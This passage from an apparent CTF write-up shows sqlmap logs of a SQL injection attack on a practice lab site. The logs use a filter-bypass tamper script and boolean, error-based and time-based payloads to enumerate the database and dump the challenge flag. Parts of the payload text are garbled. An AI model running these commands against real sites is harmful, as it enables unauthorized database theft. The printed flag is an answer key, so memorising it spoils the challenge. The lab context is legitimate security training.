[21:21:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:21:48] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:21:48] [INFO] fetching tables for database: ‘web1’ [21:21:48] [INFO] the SQL query used returns 2 entries [21:21:48] [INFO] retrieved: flag [21:21:48] [INFO] retrieved: web_1 Database: web1 [2 tables] +——-+ | flag | | web_1 | +——-+
[21:21:48] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:21:48
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag –columns
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:22:17
[21:22:17] [INFO] loading tamper script ‘space2comment’ [21:22:17] [INFO] resuming back-end DBMS ‘mysql’ [21:22:17] [INFO] testing connection to the target URL [21:22:17] [INFO] heuristics detected web page charset ‘GB2312’ [21:22:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
[21:22:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:22:17] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:22:17] [INFO] fetching columns for table ‘flag’ in database ‘web1’ [21:22:17] [INFO] the SQL query used returns 2 entries [21:22:17] [INFO] retrieved: flag [21:22:17] [INFO] retrieved: char(30) [21:22:18] [INFO] retrieved: id [21:22:18] [INFO] retrieved: int(4) Database: web1 Table: flag [2 columns] +——–+———-+ | Column | Type | +——–+———-+ | flag | char(30) | | id | int(4) | +——–+———-+
[21:22:18] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:22:18
:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag -C flag –dump
_ | | _ _ {1.0-dev-nongit-} |_ -| . | | | .’| . | || |||||,| _|
|| || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:22:35
[21:22:35] [INFO] loading tamper script ‘space2comment’ [21:22:35] [INFO] resuming back-end DBMS ‘mysql’ [21:22:35] [INFO] testing connection to the target URL [21:22:35] [INFO] heuristics detected web page charset ‘GB2312’ [21:22:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND
AND ‘lyjP’=’lyjP
Type: error-basedTitle: MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x,(SELECT (ELT())),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL &= 5.0.12 AND time-based blind (SELECT)
Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo
[21:22:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:22:35] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.18, PHP 5.2.17 back-end DBMS: MySQL 5.0 [21:22:35] [INFO] fetching entries of column(s) ‘flag’ for table ‘flag’ in database ‘web1’ [21:22:35] [INFO] the SQL query used returns 1 entries [21:22:35] [INFO] retrieved: flag{_5O_dAmn_90Od} [21:22:35] [INFO] analyzing table dump for possible password hashes Database: web1 Table: flag [1 entry] +—————————-+ | flag | +—————————-+ | flag{_5O_dAmn_90Od} | +—————————-+
[21:22:35] [INFO] table ‘web1.flag’ dumped to CSV file ‘/root/.sqlmap/output/ctf5.shiyanbar.com/dump/web1/flag.csv’ [21:22:35] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’
[*] shutting down at 21:22:35
最近读到两篇两篇不错的文章,可供参考: 1.http://www.freebuf.com/articles/web/10789.html 2.https://www.waitalone.cn/sqlmap-users-manual.html
以上是的内容，更多
的内容，请您使用右上方搜索功能获取相关信息。
若你要投稿、删除文章请联系邮箱：zixun-group@service.aliyun.com,工作人员会在五个工作日内给你回复。
云服务器 ECS
可弹性伸缩、安全稳定、简单易用
&40.8元/月起
预测未发生的攻击
&24元/月起
邮箱低至5折
推荐购买再奖现金，最高25%
&200元/3月起
你可能还喜欢
你可能感兴趣
阿里云教程中心为您免费提供
简单的sql注入之2WP相关信息，包括
的信息，所有简单的sql注入之2WP相关内容均不代表阿里云的意见！投稿删除文章请联系邮箱：zixun-group@service.aliyun.com，工作人员会在五个工作日内答复
售前咨询热线
支持与服务
资源和社区
关注阿里云
International